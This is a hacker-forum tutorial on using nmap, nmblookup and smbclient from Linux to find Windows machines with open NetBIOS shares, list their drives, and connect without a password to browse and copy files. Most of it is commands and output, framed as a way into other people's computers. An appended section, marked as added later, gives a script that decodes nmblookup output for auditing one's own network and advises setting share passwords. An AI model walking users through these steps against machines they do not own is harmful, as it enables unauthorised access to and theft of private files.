NetBIOS hacking with Samba

Hope you enjoyed my last tut on NetBIOS hacking from Windows. Now I thought Linux users will be whinging 'cause they can't be elite_ha><oars as well, so here it is: NetBIOS hacking for Linux.

The first step is to get Samba, an open source Windows file sharing thing. It's available for download at

http://www.samba.org

Install it, read the docs, etc.

Now, as in Windows, you need to make sure the computer has NetBIOS running, so we use nmap. I'm sure most of you have it and know how to use it, but just in case, get it and read the docs at

http://www.insecure.org/nmap/
Code:
[rioter@7337 rioter]$ nmap xxx.xxx.xxx.xxx

Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on  (192.168.0.44):
(The 1541 ports scanned but not shown below are in state: closed)
Port       State       Service
139/tcp    open        netbios-ssn             


Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
Those are the results from my Win98 box. As you can see, NetBIOS is wide open. Now we need to check what computers on the network we can connect to,
so we use
nmblookup -A ipaddress

Code:
[rioter@7337 rioter]$ nmblookup -A xxx.xxx.xxx.xxx
Looking up status of 192.168.0.44
	computername    <00> -         B <ACTIVE> 
	workgroup       <00> - <GROUP> B <ACTIVE> 
	computername    <03> -         B <ACTIVE> 
	computername    <20> -         B <ACTIVE> 
	workgroup       <1e> - <GROUP> B <ACTIVE> 
	userloged in    <03> -         B <ACTIVE>
<20> is the file server and it's active. <03> is the user who is logged in at the time, and you can sometimes connect to those computers.

Now, to check what drives the computer you're interested in has on it, we use smbclient -Lcomputername -I ipaddress
It will ask for a password if it's a non-Win 2k machine or it's password protected; you should just be able to hit enter and it should let you through, like it did on my computer.

Code:
[rioter@7337 rioter]$ smbclient -Lcomputername
added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0
added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0
added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0
Got a positive name query response from xxxxxxx ( xxxxxxxx )
Password: 
	Sharename      Type      Comment
	---------      ----      -------
	I              Disk      
	J              Disk      
	G              Disk      
	H              Disk      
	F              Disk      
	D              Disk      
	E              Disk      
	C              Disk      
        EPSON          Printer
	IPC$           IPC       Remote Inter Process Communication

	Server               Comment
	---------            -------
	xxxxxxx           
	xxxxxxx              xxxx

	Workgroup            Master
	---------            -------
	xxx                xxxxxxxxx
OK, now you're ready to connect to your computer. We use smbclient again:

smbclient //computername/driveletter -I ipaddress -N

Code:
[jared@7337 jared]$ smbclient //xxxxxxx/C -I xxxxxxxx -N
added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0
added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0
added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0
smb: \>
If your screen now looks like that, you can browse their computer. Use normal DOS commands, e.g. dir etc.

Some FTP commands also work, but the ones you will probably use the most are get and put, so get filename.exe will d/l the file for you to the current dir you are in.
To exit, just type exit.
That's it. Easy, ain't it?

To get the other commands available to you in the programs we used, just do a man programname.

RiOtEr

Well, I have to thank negative for the formatting on the last one, but also being a bitch today.

And this isn't a desperate bid to get antipoints. As jp said, we take take take take,
so I thought I would give give give.
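
For the nmblookup step above, an added example (not part of the original tutorial) that decodes the suffix codes in a node status table, so you can inventory which machines on your own network advertise the <20> file server service and which names are logged-in users. The sample output, host names and function names are constructed for illustration.

```shell
#!/bin/sh
# Constructed sample of `nmblookup -A` output (placeholder names and address).
SAMPLE='Looking up status of 192.0.2.44
	WIN98BOX        <00> -         B <ACTIVE> 
	HOMEGROUP       <00> - <GROUP> B <ACTIVE> 
	WIN98BOX        <03> -         B <ACTIVE> 
	WIN98BOX        <20> -         B <ACTIVE> 
	HOMEGROUP       <1e> - <GROUP> B <ACTIVE> 
	ALICE           <03> -         B <ACTIVE> '

# decode_node_status (hypothetical helper): reads nmblookup -A output on
# stdin and prints "name|suffix|meaning" for every ACTIVE registration.
# Assumes names without embedded spaces.
decode_node_status() {
  awk '
    /<ACTIVE>/ && match($0, /<[0-9A-Fa-f][0-9A-Fa-f]>/) {
      name = $1
      sfx  = tolower(substr($0, RSTART + 1, 2))
      grp  = ($0 ~ /<GROUP>/)
      if      (sfx == "00" && !grp) m = "workstation service (computer name)"
      else if (sfx == "00" &&  grp) m = "workgroup or domain name"
      else if (sfx == "03")         m = "messenger service (computer or logged-in user)"
      else if (sfx == "20")         m = "file server service (shares reachable over NetBIOS)"
      else if (sfx == "1e" &&  grp) m = "browser election group"
      else                          m = "other"
      print name "|" sfx "|" m
    }'
}

# advertises_file_service: exit status 0 if an active <20> name is registered.
advertises_file_service() {
  decode_node_status | grep -q '|20|'
}

# logged_in_names: <03> names that are not the computer name itself.
logged_in_names() {
  decode_node_status | awk -F'|' '
    $2 == "00" && $3 ~ /^workstation/ { host = $1 }
    $2 == "03" { seen[$1] = 1 }
    END { for (n in seen) if (n != host) print n }'
}

printf '%s\n' "$SAMPLE" | decode_node_status
```

A host that shows <20> and lets smbclient in on a blank password, as the Win98 box in this tutorial did, needs a share password set or file sharing turned off.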